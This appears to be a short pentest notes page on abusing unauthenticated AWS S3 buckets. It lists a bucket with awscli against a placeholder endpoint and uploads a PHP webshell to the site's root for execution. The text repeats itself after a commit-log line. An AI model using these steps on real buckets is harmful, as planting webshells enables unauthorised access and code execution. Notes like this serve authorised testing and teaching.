killchain-compendium/Exploits/Databases/S3.md

# AWS S3 Buckets

* `awscli` is the official tool

## Configuration

* An S3 bucket may not be configured to authenticte. Therefore the tool is configured with random credentials via `aws configure`

* List the endpoint via
```sh
aws --endpoint=http://s3.example.com s3 ls
2022-12-08 21:06:33 example.com
```

* List the top level domain afterwards
```sh
aws --endpoint=http://s3.example.com s3 ls s3://example.com
2022-12-08 21:06:33          0 .htaccess
2022-12-08 21:06:33      1218 index.html
```

* Upload a (webshell) and execute
```sh
aws --endpoint=http://s3.example.com s3 cp monkey.php s3://example.com
```
added MongoDB specifics 2022-12-09 00:00:02 +01:00			`# AWS S3 Buckets`

			* `awscli` is the official tool

			`## Configuration`

			* An S3 bucket may not be configured to authenticte. Therefore the tool is configured with random credentials via `aws configure`

			`* List the endpoint via`
			```sh
			`aws --endpoint=http://s3.example.com s3 ls`
			`2022-12-08 21:06:33 example.com`
			```

			`* List the top level domain afterwards`
			```sh
			`aws --endpoint=http://s3.example.com s3 ls s3://example.com`
			`2022-12-08 21:06:33 0 .htaccess`
			`2022-12-08 21:06:33 1218 index.html`
			```

			`* Upload a (webshell) and execute`
			```sh
			`aws --endpoint=http://s3.example.com s3 cp monkey.php s3://example.com`
			```